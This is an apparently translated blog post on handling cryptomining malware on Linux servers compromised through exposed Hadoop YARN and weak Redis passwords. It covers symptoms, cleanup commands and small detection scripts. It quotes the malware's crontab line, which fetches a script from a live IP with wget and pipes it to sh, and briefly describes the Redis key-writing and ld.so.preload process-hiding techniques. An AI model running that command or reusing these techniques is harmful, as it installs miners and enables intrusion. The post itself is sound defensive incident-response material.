Analysis of a crypto-mining malware infection (this article is not exhaustive)

Source: Internet
Author: User

Well, yesterday in a friend's technical chat group I saw a server that had been infected with a crypto-miner being dealt with ...

It suddenly reminded me of the time I helped my wife's company handle an incident in which the weak-password vulnerability of their Hadoop YARN management platform was exploited,

and the server became a captive of the miners.

Symptoms in that earlier case:

Visiting the yarn:8088 page showed a job running.

The user was Dr.Who; asking the internal staff, nobody had any job running;

Conclusion:

The server had been compromised through the unauthorized-access vulnerability of the Hadoop YARN ResourceManager REST API: anyone can use it to execute code on the server remotely without authentication, which is a security issue that needs attention.

The top command showed CPU usage above 360%, and the system was extremely sluggish.

Workaround:

1. Find the high-CPU process with top and kill it.

2. Check the /tmp and /var/tmp directories and delete abnormal files such as java, ppc, w.conf.

3. crontab -l shows a scheduled task of the form * wget -q -O - http://46.249.38.186/cr.sh | sh >/dev/null 2>&1; delete this task.

4. Go through the YARN logs, confirm which application is abnormal, and delete it.

Then verify with top again whether any high-CPU process remains; if there is one, kill it; if not, things should be back to normal.

Note: YARN provides a REST API, open by default on ports 8088 and 8090 (8088 being the default), which lets users create applications and submit and execute tasks directly through the API. If it is misconfigured and the REST API is reachable from the public network, it allows unauthorized access, and anyone can use it for remote command execution, mining and other activities: a command submitted through the open 8088 REST API downloads and executes a .sh script on the server, which in turn downloads and starts the mining program. So take note: enable Kerberos authentication, disable anonymous access, and change port 8088.

So I volunteered, thinking it was a similar situation.

Technical group conversation ~~



Encrypted script content:

Post-decryption script excerpt:

So I couldn't help myself,

asked for a remote connection to take a look,

deleted a few things and tried again,

following the script in reverse,

but the result was still not clean: top showed the CPU 100% busy.

It was not clear which program was occupying it.

I blamed it on network delay; it was not that.

So I wanted to confirm that top had been replaced,

kept reading the script,

and found an image embedded in a forged library file of the same name;

at the same time the library file invokes the download-and-execute script,

so the top program runs automatically and the descendants never end.


(The script's payload is an image that is decrypted and then placed on the attacker's own server)

I wanted to kill this top library file,

but because of the deceptive naming,

plus a program that would not die cleanly,

when the rm -rf was executed

I could clearly feel the tension of the friend on the other side.

So, knowing his business,

and finding that the impact on the machine's business was not serious,

and it being almost time to leave work, I did not want to keep at it.


I went through the script carefully once more,

wanting to reinstall the system and share the lessons with the other friend,

but feeling that the other friend

was not willing to study this problem thoroughly,

I recommended that the system be reinstalled.

Afterwards, a summary written on the subway.

Common ways of handling a mining malware infection

Thought process and suggested methods.

1. How does a server end up running a mining program?

Compromised hosts with weak passwords, webshells, XSS, software vulnerabilities, bugs, Redis, ZooKeeper, MySQL, 0-days, YARN and so on lead to the server being scanned and privilege-escalated.

2. At first we just kill the mining program, and it comes back up.

That is because the scheduled task, the commands, the modified boot files and the history were not cleaned up.

3. How do I handle it?

First of all, decide according to the business: if the incident causes business failure, you can choose an HA scheme to switch the application services over, cut the server off from all network sources, and then do the related handling.

Of course, the general approach is this: first block the addresses with iptables or another firewall, which amounts to cutting off the network source, then analyze and deal with the cause of the mining.

The handling can be done by working through the mining script item by item, recovering or deleting the commands and files it modified.

Afterwards, run security testing on the system and the web application and fix the system vulnerabilities.

Use Linux backdoor/rootkit detection tools such as chkrootkit and rkhunter to check the host.

Compare MD5 values of system files. In fact, the biggest factor in security is people.

Of course, monitoring is also very important.

4. Root cause of this case

A weak Redis password caused this incident. Redis's CONFIG command can be used to change the server's configuration directory, and the attacker writes their own key into it, thereby gaining control of the server.

The Redis unauthorized-access flaw can easily get a system compromised:

https://www.seebug.org/vuldb/ssvid-89715

Suggested post-incident commands for similar cases:

See which process is occupying the CPU

with top or ps aux

In this case top did not show which process was consuming the CPU. After reading the script, cat /etc/ld.so.preload showed that an abnormal file was loaded from there as well; the judgement is that it is used to hide the process. It is recommended to comment out or delete its contents, run ldconfig, and then look at the processes with top again;


Doubt:

The image in the script can be opened in a browser but not locally; the suspicion is steganography (a hidden backdoor).

It cannot be opened locally, and the steganography tool cannot open it either.

Use ls -lt /etc | head to view recently changed files in a directory

or use the find command with the stat parameter to find recently modified files

Of course, a careful attacker will modify the file change timestamps.

Find the process file and delete it; any one of these commands will do

ps -ef | grep shutdown [command]

ps aux | grep /bin/bash [command path]

ps aux | grep bash [command]

lsof -p PID

cd /proc/4170 [PID]   (ls -l /proc/PID/exe and /proc/PID/cwd show the binary and working directory even if the file has been deleted)


Find all zombie processes in the system

ps aux | grep 'defunct'

or

ps -ef | grep defunct | grep -v grep | wc -l

Clean up zombie processes (a zombie cannot be killed directly; these commands signal its parent so that the zombie is reaped)

ps -e -o ppid,stat | awk '$2 ~ /^Z/ {print $1}' | xargs kill -9

or

kill -HUP $(ps -A -o stat,ppid | grep -e '^[Zz]' | awk '{print $2}')

Find scheduled tasks in the system

crontab -l

or

cd /var/spool/cron   # look at the files in this directory and delete the malicious ones

vim /etc/crontab

There will be a scheduled task, and it generally cannot simply be deleted. Opening its URL in a browser gives a script that is Base64-encoded; decoding it shows the script's contents.
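As an added example (not code from the original post), a small POSIX sh filter that flags crontab lines matching the persistence pattern seen in both incidents above: a wget/curl download piped into a shell, or something executed out of a temp directory. The function names are my own, and the sample crontab text is constructed for the demonstration.

```shell
# Added example, not from the original post. Reads crontab text on stdin
# (e.g. `crontab -l`, /etc/crontab, or a file under /var/spool/cron) and
# prints "SUSPECT: <line>" for entries that look like the miner's
# persistence: a wget/curl download piped into sh/bash, a shell started
# with -c on a URL, or anything executed out of /tmp, /var/tmp, /dev/shm.
# Returns 1 if at least one suspect line was found, 0 otherwise.
scan_cron_text() {
    found=0
    while IFS= read -r line; do
        case "$line" in
            ''|'#'*) continue ;;          # skip blank lines and comments
        esac
        if printf '%s\n' "$line" | grep -Eq '(wget|curl)[^|]*\|[[:space:]]*(ba)?sh' \
        || printf '%s\n' "$line" | grep -Eq '(ba)?sh[[:space:]]+-c[[:space:]]+.*https?://' \
        || printf '%s\n' "$line" | grep -Eq '(^|[[:space:]])(/tmp|/var/tmp|/dev/shm)/'; then
            printf 'SUSPECT: %s\n' "$line"
            found=1
        fi
    done
    return "$found"
}

# Convenience wrapper for a live host: checks the current user's crontab,
# the system crontab, cron.d and the per-user spool files the post mentions.
scan_host_cron() {
    {
        crontab -l 2>/dev/null
        cat /etc/crontab /etc/cron.d/* /var/spool/cron/* /var/spool/cron/crontabs/* 2>/dev/null
    } | scan_cron_text
}
```

Running scan_host_cron as root on the affected box lists the lines to remove; review each hit by hand, since a legitimate job can also live in /tmp.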

Also pay attention to the startup scripts.

Following the script, delete the files it created; in this case I expected to delete

/usr/local/lib/dns.so and /etc/ld.so.preload
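As an added example (not code from the original post), two POSIX sh functions covering the /etc/ld.so.preload handling mentioned above and in the process-hiding paragraph: one audits the file's entries, the other backs it up and empties it. The file path is a parameter so the functions can be exercised on a copy; the function names are my own and the sample file is constructed.

```shell
# Added example, not from the original post. Audits an ld.so.preload file
# (the real one is /etc/ld.so.preload; the path is a parameter so the
# function can be run against a copy) and, once the entries are reviewed,
# empties it so that top/ps no longer load the hooking library.
# Assumption: on a clean host the file is absent or empty.

# Print each preloaded library and whether it exists on disk. Entries may be
# one per line or whitespace-separated, which is how the loader reads them.
# Returns 0 when nothing is preloaded, 1 when at least one entry is present.
audit_preload() {
    file=$1
    [ -f "$file" ] || return 0
    entries=$(sed 's/#.*//' "$file" | tr -s '[:space:]' '\n' | sed '/^$/d')
    [ -n "$entries" ] || return 0
    printf '%s\n' "$entries" | while IFS= read -r lib; do
        if [ -e "$lib" ]; then
            printf 'PRELOADED: %s (present on disk, review before deleting)\n' "$lib"
        else
            printf 'PRELOADED: %s (referenced but missing)\n' "$lib"
        fi
    done
    return 1
}

# Keep a timestamped copy for forensics, then truncate the file.
# After this, run ldconfig and re-check with top, as the post describes.
neutralise_preload() {
    file=$1
    [ -f "$file" ] || return 0
    cp -p "$file" "$file.bak.$(date +%Y%m%d%H%M%S)"
    : > "$file"
}
```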

Viewing the system login log

Log file /var/log/wtmp: every login to the system adds a record to this log; to prevent tampering, it is a binary file

cd /var/log; last   or   last -f /var/log/wtmp

Of course, in this case the logs had all been wiped.

Delete the command history, to prevent the intruder from seeing what you have done if they get in again

history shows the command history


history -c clears only the history of the current shell; the system normally keeps the history in a file, and as long as that file's contents do not change, the saved history does not change. On Linux the file holding the command history is .bash_history; emptying it (echo '' > /root/.bash_history) empties those historical commands.

Calling history -c from a shell script will not clear the current shell's history, because bash by default runs the script in a child process, so history -c in the child clears that child's history, not the history of your current shell.

You can run the script with source (source ./script), which executes the commands in the current bash environment.

Close ports you do not need

Block access to the mining server by blocking the domain name / IP found in the script

iptables -A INPUT -s xmr.crypto-pool.fr -j DROP
iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP

If Redis is installed, change the Redis port and set a more complex password.

Experts, please leave more comments and advice.

Don't ever do this!
